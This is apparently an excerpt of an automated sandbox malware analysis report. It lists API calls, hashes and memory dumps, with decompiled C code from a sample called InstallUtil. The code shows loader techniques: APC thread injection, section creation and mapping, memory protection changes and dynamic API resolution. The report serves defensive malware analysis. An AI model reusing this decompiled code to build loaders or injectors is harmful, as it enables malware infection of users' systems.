                                                            • Gerayido wowi refa todiquac xagiheye cek nikigon, xrefs: 00B28418
                                                            • Sehiti viwo xejavi rowaje lowiye quiquig fehoquib yegov jajexawi horiquo, xrefs: 00B28346
                                                            • Ciquek yavi gej quide haqueto lodise felig joquolaw hofasofe mevifeta xari, xrefs: 00B28411
                                                            • Pih tivago yotefaxi, xrefs: 00B283ED
                                                            • Yofixece dip, xrefs: 00B28368
                                                            • Xonoxex makojec yoyis, xrefs: 00B29771
                                                            • Quotamis miro, xrefs: 00B28358
                                                            • Mobiw yado quagiy sonano quif, xrefs: 00B2976A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$CloseCreateHandlePathServiceStartStatusStrokeTape
                                                            • String ID: Cibovido nosequop cakiy jivage devicequ xohefeci giti nisam$Ciquek yavi gej quide haqueto lodise felig joquolaw hofasofe mevifeta xari$Dove$Gerayido wowi refa todiquac xagiheye cek nikigon$Geyofe goyabor sihosata bepafem xovaxek$Jeho rotaceto wed kegejaf$Mobiw yado quagiy sonano quif$Pih tivago yotefaxi$Quotamis miro$Sehiti viwo xejavi rowaje lowiye quiquig fehoquib yegov jajexawi horiquo$Sowaqu xagogici hega mehiyeq kegib vodal wed yihesohe niteco layadome$Vas bahotiga$Vira yiqu poros kiqu xiborefo lenixed vec$Xonoxex makojec yoyis$Yamadep kepexok kod maneseka$Yofixece dip
                                                            • API String ID: 4009143142-2936482510
                                                            • Opcode ID: b53b1938055fd2d862c04ecf705812adb7e27608dd3b9b68163526efe1ad12e2
                                                            • Instruction ID: 83ee1cb944617297f23af6d4e8d67600783873252cc6955bba5ec6a12b96181b
                                                            • Opcode Fuzzy Hash: b53b1938055fd2d862c04ecf705812adb7e27608dd3b9b68163526efe1ad12e2
                                                            • Instruction Fuzzy Hash: 3F411971C49268EBCB14CFA8E8497AEBBF0EF15305F108099E519AB341CB745A45CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B3A1A0 Relevance: 7.6, APIs: 5, Instructions: 59COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 00B3E92D
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B3E944
                                                            • UnhandledExceptionFilter.KERNEL32(00B2606C), ref: 00B3E94F
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00B3E96D
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00B3E974
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: 5d863da605b4f8af145112a94de7744f34597d2e0c2c934ac6e3b5436d40b2f8
                                                            • Instruction ID: d723cf686446c5c238fa1211951c62e2ebd5bd513aa16dc8c45c5e6b7641b297
                                                            • Opcode Fuzzy Hash: 5d863da605b4f8af145112a94de7744f34597d2e0c2c934ac6e3b5436d40b2f8
                                                            • Instruction Fuzzy Hash: 0F2145B8862344DFC708CF59FC85B8E3BA8FB18302F11459AE80993760E7716581DF89
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B322D0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00012260), ref: 00B322DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 4e56d57e7c4c9e5885e516514204ceee73ee59db4e0d56a2879f0db2bacacb0a
                                                            • Instruction ID: b6da399a397242c31ed9c396e3a933a53102bbdde19d07a5f84a3158d3ebdad9
                                                            • Opcode Fuzzy Hash: 4e56d57e7c4c9e5885e516514204ceee73ee59db4e0d56a2879f0db2bacacb0a
                                                            • Instruction Fuzzy Hash: 94B0123214828C37031113E66C098033ACCD5C57307510861F00C82010ED9194414055
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B35840 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 126COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __isctype_l.LIBCMTD ref: 00B358D5
                                                            • __chvalidator_l.LIBCMTD ref: 00B358F5
                                                              • Part of subcall function 00B39FD0: _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00B3A03F
                                                            • _swprintf_s.LIBCMTD ref: 00B35958
                                                            • __invoke_watson_if_oneof.LIBCMTD ref: 00B35986
                                                            • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00B359CB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: Locale$UpdateUpdate::~_$__chvalidator_l__invoke_watson_if_oneof__isctype_l_swprintf_s
                                                            • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                                            • API String ID: 2593626323-2130928175
                                                            • Opcode ID: 6349011044188d5a82dcae9c1c4b34086e39a5057be9d9cdc372197b35c54526
                                                            • Instruction ID: 91b95b74ae99bd525b1f29510128c2b90b0714dc220920a15791afe86d1faa4e
                                                            • Opcode Fuzzy Hash: 6349011044188d5a82dcae9c1c4b34086e39a5057be9d9cdc372197b35c54526
                                                            • Instruction Fuzzy Hash: 66418F70904758EFDB18EBA4CC46BAEB7F5AF54300F304598E509AF296DB70AA04CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B372C0 Relevance: 10.8, APIs: 7, Instructions: 255COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • getSystemCP.LIBCMTD ref: 00B372D7
                                                              • Part of subcall function 00B371B0: GetOEMCP.KERNEL32(00000000,5284C274,00C31AE8,000000FF,?,00B36F68,?), ref: 00B3720B
                                                              • Part of subcall function 00B371B0: _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00B3721E
                                                            • setSBCS.LIBCMTD ref: 00B372EC
                                                            • setSBUpLow.LIBCMTD ref: 00B37448
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: Locale$SystemUpdateUpdate::~_
                                                            • String ID:
                                                            • API String ID: 2101441384-0
                                                            • Opcode ID: d93a29af39243cd657ef8eae11d6174748d7bf207502025c8dcb76bbef84447e
                                                            • Instruction ID: 44c6e1d1ac77acffd5ea99e845bf38a80f5d34f78ed01dfce85f3706d00c5c46
                                                            • Opcode Fuzzy Hash: d93a29af39243cd657ef8eae11d6174748d7bf207502025c8dcb76bbef84447e
                                                            • Instruction Fuzzy Hash: CAB15BB0948119EBCB28CF54C880AAEBBF1FF54314F24C599D8265B341DB30EA41DF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B306F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.dll), ref: 00B30740
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID: -$KERNEL32.dll$y
                                                            • API String ID: 4139908857-3350792778
                                                            • Opcode ID: 48d3ed48848f7eefc5571d85210dec56f43901601290263ac23b0998924593a2
                                                            • Instruction ID: 815327a7b028ec971328a0f695e870da8c791706e11daae128640ce9dcb1e43b
                                                            • Opcode Fuzzy Hash: 48d3ed48848f7eefc5571d85210dec56f43901601290263ac23b0998924593a2
                                                            • Instruction Fuzzy Hash: 79F0F8B0C15218EBDB00EFD0D849BDEBBF4BB04348F104188D5056B290C7B92648CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:53.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:30.9%
                                                            Total number of Nodes:110
                                                            Total number of Limit Nodes:11
                                                            execution_graph 391 401a98 392 401ab1 391->392 403 401e35 ConvertStringSecurityDescriptorToSecurityDescriptorA 392->403 394 401ac5 404 401479 394->404 396 401aea 397 401b45 ExitThread 396->397 398 401aee lstrlenW 396->398 409 401b52 GetSystemTimeAsFileTime _aulldiv _snwprintf 398->409 402 401b11 420 4011c1 402->420 403->394 405 4014bf 404->405 407 40153c 405->407 431 401935 HeapAlloc 405->431 432 401265 HeapFree 405->432 407->396 410 401bb0 CreateFileMappingW 409->410 411 401bab 409->411 412 401c13 GetLastError 410->412 413 401bcb 410->413 411->410 414 401bf4 412->414 415 401be4 MapViewOfFile 413->415 416 401bd6 GetLastError 413->416 414->402 415->414 418 401c02 GetLastError 415->418 416->415 417 401bdf 416->417 419 401c0a CloseHandle 417->419 418->414 418->419 419->414 433 4012d3 420->433 422 401259 422->397 423 4011fd 423->422 424 401247 423->424 446 401ea1 423->446 457 401265 HeapFree 424->457 430 40123f GetLastError 430->424 431->405 432->405 458 401935 HeapAlloc 433->458 435 4012e1 436 4012eb GetModuleHandleA GetProcAddress 435->436 445 401397 435->445 437 401322 GetProcAddress 436->437 438 401390 436->438 437->438 440 401338 GetProcAddress 437->440 438->445 465 401265 HeapFree 438->465 440->438 441 40134e GetProcAddress 440->441 441->438 442 401364 GetProcAddress 441->442 442->438 443 40137a 442->443 459 40188d NtCreateSection 443->459 445->423 447 40121c 446->447 449 401ec4 446->449 447->424 452 40105a VirtualProtect 447->452 448 401ed5 LoadLibraryA 448->447 448->449 449->447 449->448 451 401f3e 449->451 450 401f47 GetProcAddress 450->451 451->449 451->450 453 401132 452->453 454 4010a3 452->454 453->424 453->430 454->453 455 4010f9 VirtualProtect 454->455 455->454 456 40110e GetLastError 455->456 456->454 457->422 458->435 460 4018f1 459->460 461 40191e 459->461 466 4013b7 NtMapViewOfSection 460->466 461->438 464 401905 memset 464->461 465->445 467 4013eb 466->467 467->461 467->464 468 401e5b HeapCreate 469 401e74 GetModuleHandleA GetCommandLineW 468->469 470 401e99 ExitProcess 468->470 473 4015c0 469->473 502 401400 CreateEventA 473->502 475 4015cc 477 4015f5 NtQuerySystemInformation 475->477 482 401737 HeapDestroy 475->482 509 401935 HeapAlloc 475->509 510 401c24 475->510 530 401265 HeapFree 475->530 477->475 481 401654 481->482 516 401d45 481->516 482->470 485 40169b CreateThread 489 401728 GetLastError 485->489 490 4016cf QueueUserAPC 485->490 486 401669 GetLongPathNameW 486->485 488 40167d 486->488 528 401935 HeapAlloc 488->528 495 40172d 489->495 493 401704 490->493 494 4016e9 GetLastError TerminateThread CloseHandle SetLastError 490->494 492 401687 492->485 497 401690 GetLongPathNameW 492->497 493->489 498 401708 WaitForSingleObject 493->498 494->493 495->482 496 401735 GetLastError 495->496 496->482 529 401265 HeapFree 497->529 500 401723 CloseHandle 498->500 501 401718 GetExitCodeThread 498->501 500->495 501->500 503 401472 GetLastError 502->503 504 40141e GetVersion 502->504 505 401428 504->505 506 401435 GetCurrentProcessId OpenProcess 505->506 507 40146d 505->507 508 401462 506->508 507->475 508->475 509->475 511 401c40 510->511 512 401c4b VirtualAlloc 511->512 513 40163f Sleep 511->513 512->513 515 401c8b 512->515 513->475 513->481 514 401d23 VirtualFree 514->513 515->514 531 401935 HeapAlloc 516->531 518 401d63 519 401d69 GetModuleFileNameW 518->519 520 401665 518->520 521 401d9a 519->521 525 401d7b 519->525 520->485 520->486 521->520 523 401da5 521->523 524 401dac GetLastError 521->524 523->520 534 401265 HeapFree 524->534 525->519 525->521 532 401265 HeapFree 525->532 533 401935 HeapAlloc 525->533 528->492 529->485 530->475 531->518 532->525 533->525 534->523

                                                            Callgraph

                                                            Executed Functions

                                                            Function 004015C0 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 140threadsleepnativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            C-Code - Quality: 88%
                                                            			E004015C0() {
				long _v8;
				long _v12;
				long _v16;
				void* _v40;
				void* __edi;
				long _t31;
				long _t33;
				long _t34;
				void* _t37;
				long _t40;
				long _t41;
				long _t45;
				void* _t48;
				struct _SECURITY_ATTRIBUTES* _t50;
				signed int _t54;
				signed int _t55;
				struct _SECURITY_ATTRIBUTES* _t59;
				long _t61;
				signed int _t62;
				void* _t66;
				void* _t69;
				signed int _t71;
				signed int _t72;
				void* _t75;
				intOrPtr* _t76;

				_t31 = E00401400();
				_t59 = 0;
				_v8 = _t31;
				if(_t31 != 0) {
					return _t31;
				}
				do {
					_t71 = 0;
					_v16 = _t59;
					_v12 = 0x30;
					do {
						_t66 = E00401935(_v12);
						if(_t66 == _t59) {
							_v8 = 8;
						} else {
							_t54 = NtQuerySystemInformation(8, _t66, _v12,  &_v16); // executed
							_t62 = _t54;
							_t55 = _t54 & 0x0000ffff;
							_v8 = _t55;
							if(_t55 == 4) {
								_v12 = _v12 + 0x30;
							}
							_t72 = 0x13;
							_t15 = _t62 + 1; // 0x1
							_t71 =  *_t66 % _t72 + _t15;
							E00401265(_t66);
						}
					} while (_v8 != _t59);
					_t33 = E00401C24(_t66, _t71); // executed
					_v8 = _t33;
					Sleep(_t71 << 4); // executed
					_t34 = _v8;
				} while (_t34 == 9);
				if(_t34 != _t59) {
					L28:
					return _t34;
				}
				if(E00401D45(_t62,  &_v12) != 0) {
					 *0x403178 = _t59;
					L18:
					_t37 = CreateThread(_t59, _t59, __imp__SleepEx,  *0x403180, _t59, _t59); // executed
					_t75 = _t37;
					if(_t75 == _t59) {
						L25:
						_v8 = GetLastError();
						L26:
						_t34 = _v8;
						if(_t34 == 0xffffffff) {
							_t34 = GetLastError();
						}
						goto L28;
					}
					_t40 = QueueUserAPC(E00401A98, _t75,  &_v40); // executed
					if(_t40 == 0) {
						_t45 = GetLastError();
						_v16 = _t45;
						TerminateThread(_t75, _t45);
						CloseHandle(_t75);
						_t75 = 0;
						SetLastError(_v16);
					}
					if(_t75 == 0) {
						goto L25;
					} else {
						_t41 = WaitForSingleObject(_t75, 0xffffffff);
						_v8 = _t41;
						if(_t41 == 0) {
							GetExitCodeThread(_t75,  &_v8);
						}
						CloseHandle(_t75);
						goto L26;
					}
				}
				_t76 = __imp__GetLongPathNameW;
				_t61 = _v12;
				_t48 =  *_t76(_t61, _t59, _t59); // executed
				_t69 = _t48;
				if(_t69 == 0) {
					L15:
					 *0x403178 = _t61;
					L16:
					_t59 = 0;
					goto L18;
				}
				_t23 = _t69 + 2; // 0x2
				_t50 = E00401935(_t69 + _t23);
				 *0x403178 = _t50;
				if(_t50 == 0) {
					goto L15;
				}
				 *_t76(_t61, _t50, _t69); // executed
				E00401265(_t61);
				goto L16;
			}




























                                                            0x004015c7
                                                            0x004015cc
                                                            0x004015ce
                                                            0x004015d3
                                                            0x0040173b
                                                            0x0040173b
                                                            0x004015db
                                                            0x004015db
                                                            0x004015dd
                                                            0x004015e0
                                                            0x004015e7
                                                            0x004015ef
                                                            0x004015f3
                                                            0x0040162d
                                                            0x004015f5
                                                            0x004015ff
                                                            0x00401605
                                                            0x00401607
                                                            0x0040160c
                                                            0x00401612
                                                            0x00401614
                                                            0x00401614
                                                            0x0040161c
                                                            0x00401622
                                                            0x00401622
                                                            0x00401626
                                                            0x00401626
                                                            0x00401634
                                                            0x0040163a
                                                            0x00401643
                                                            0x00401646
                                                            0x0040164c
                                                            0x0040164f
                                                            0x00401656
                                                            0x00401737
                                                            0x00000000
                                                            0x00401738
                                                            0x00401667
                                                            0x004016a7
                                                            0x004016ad
                                                            0x004016bd
                                                            0x004016c3
                                                            0x004016cd
                                                            0x00401728
                                                            0x0040172a
                                                            0x0040172d
                                                            0x0040172d
                                                            0x00401733
                                                            0x00401735
                                                            0x00401735
                                                            0x00000000
                                                            0x00401733
                                                            0x004016d9
                                                            0x004016e7
                                                            0x004016e9
                                                            0x004016ed
                                                            0x004016f0
                                                            0x004016f7
                                                            0x004016fc
                                                            0x004016fe
                                                            0x004016fe
                                                            0x00401706
                                                            0x00000000
                                                            0x00401708
                                                            0x0040170b
                                                            0x00401711
                                                            0x00401716
                                                            0x0040171d
                                                            0x0040171d
                                                            0x00401724
                                                            0x00000000
                                                            0x00401724
                                                            0x00401706
                                                            0x00401669
                                                            0x00401671
                                                            0x00401675
                                                            0x00401677
                                                            0x0040167b
                                                            0x0040169d
                                                            0x0040169d
                                                            0x004016a3
                                                            0x004016a3
                                                            0x00000000
                                                            0x004016a3
                                                            0x0040167d
                                                            0x00401682
                                                            0x00401687
                                                            0x0040168e
                                                            0x00000000
                                                            0x00000000
                                                            0x00401693
                                                            0x00401696
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00401400: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004015CC), ref: 0040140F
                                                              • Part of subcall function 00401400: GetVersion.KERNEL32 ref: 0040141E
                                                              • Part of subcall function 00401400: GetCurrentProcessId.KERNEL32 ref: 0040143A
                                                              • Part of subcall function 00401400: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401453
                                                              • Part of subcall function 00401935: HeapAlloc.KERNEL32(00000000,?,004015EF,00000030,?,00000000), ref: 00401941
                                                            • NtQuerySystemInformation.NTDLL ref: 004015FF
                                                            • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401646
                                                            • GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401675
                                                            • GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401693
                                                            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 004016BD
                                                            • QueueUserAPC.KERNELBASE(00401A98,00000000,?,?,00000000), ref: 004016D9
                                                            • GetLastError.KERNEL32(?,00000000), ref: 004016E9
                                                            • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004016F0
                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004016F7
                                                            • SetLastError.KERNEL32(?,?,00000000), ref: 004016FE
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 0040170B
                                                            • GetExitCodeThread.KERNEL32(00000000,00000008,?,00000000), ref: 0040171D
                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401724
                                                            • GetLastError.KERNEL32(?,00000000), ref: 00401728
                                                            • GetLastError.KERNEL32(?,00000000), ref: 00401735
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Thread$CloseCreateHandleLongNamePathProcess$AllocCodeCurrentEventExitHeapInformationObjectOpenQueryQueueSingleSleepSystemTerminateUserVersionWait
                                                            • String ID: 0
                                                            • API String ID: 2806485730-4108050209
                                                            • Opcode ID: 64f5e00dd3e9df56bafb44a3b12719b211d84c9052b4447aa62019f6059b615a
                                                            • Instruction ID: 3b3c7b31539dcb68cec7446801a6dcec4e678bc0dd0ee261a99a295e6f7dabed
                                                            • Opcode Fuzzy Hash: 64f5e00dd3e9df56bafb44a3b12719b211d84c9052b4447aa62019f6059b615a
                                                            • Instruction Fuzzy Hash: 1E4175B1D00215BBDB11AFB58D8899F7ABCEF49354B14447BE501F32A0D7788E45CB68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040188D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 78 40188d-4018ef NtCreateSection 79 4018f1-4018fa call 4013b7 78->79 80 401926-40192a 78->80 83 4018ff-401903 79->83 86 40192c-401932 80->86 84 401905-40191c memset 83->84 85 40191e-401924 83->85 84->86 85->86
                                                            C-Code - Quality: 72%
                                                            			E0040188D(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E004013B7(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                            0x00401896
                                                            0x0040189d
                                                            0x0040189e
                                                            0x0040189f
                                                            0x004018a0
                                                            0x004018a1
                                                            0x004018b2
                                                            0x004018b6
                                                            0x004018ca
                                                            0x004018cd
                                                            0x004018d0
                                                            0x004018d7
                                                            0x004018da
                                                            0x004018e1
                                                            0x004018e4
                                                            0x004018e7
                                                            0x004018ea
                                                            0x004018ef
                                                            0x0040192a
                                                            0x004018f1
                                                            0x004018f4
                                                            0x004018fa
                                                            0x004018ff
                                                            0x00401903
                                                            0x00401921
                                                            0x00401905
                                                            0x0040190c
                                                            0x0040191a
                                                            0x0040191a
                                                            0x00401903
                                                            0x00401932

                                                            APIs
                                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000,?), ref: 004018EA
                                                              • Part of subcall function 004013B7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004018FF,00000002,00000000,?,?,00000000,?,?,004018FF,00000002), ref: 004013E4
                                                            • memset.NTDLL ref: 0040190C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateViewmemset
                                                            • String ID: @
                                                            • API String ID: 2533685722-2766056989
                                                            • Opcode ID: f98fdfa0b9c110206f692fa6e071b6c5229f6039fb92708234d3b282d3df2b2e
                                                            • Instruction ID: 79cf47f5c86633d9c26e27e66d3e7f98e8f199bdcf07d2fc9e6fc7d80f7c65ac
                                                            • Opcode Fuzzy Hash: f98fdfa0b9c110206f692fa6e071b6c5229f6039fb92708234d3b282d3df2b2e
                                                            • Instruction Fuzzy Hash: BD210BB5D00209AFDB11DFA9C8849EEFBB9EB48354F10443AE605F3250D7349A458B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004013B7 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 171 4013b7-4013e9 NtMapViewOfSection 172 4013eb-4013ed 171->172 173 4013ef 171->173 174 4013f3-4013f6 172->174 173->174
                                                            C-Code - Quality: 68%
                                                            			E004013B7(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                            0x004013c9
                                                            0x004013cf
                                                            0x004013dd
                                                            0x004013e4
                                                            0x004013e9
                                                            0x004013ef
                                                            0x00000000
                                                            0x004013f0
                                                            0x00000000

                                                            APIs
                                                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004018FF,00000002,00000000,?,?,00000000,?,?,004018FF,00000002), ref: 004013E4
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: SectionView
                                                            • String ID:
                                                            • API String ID: 1323581903-0
                                                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                            • Instruction ID: 41f1b71bfb69d62c51169e198a11b6a204b8a90c14ade405c3a2c3140c4f7bb8
                                                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
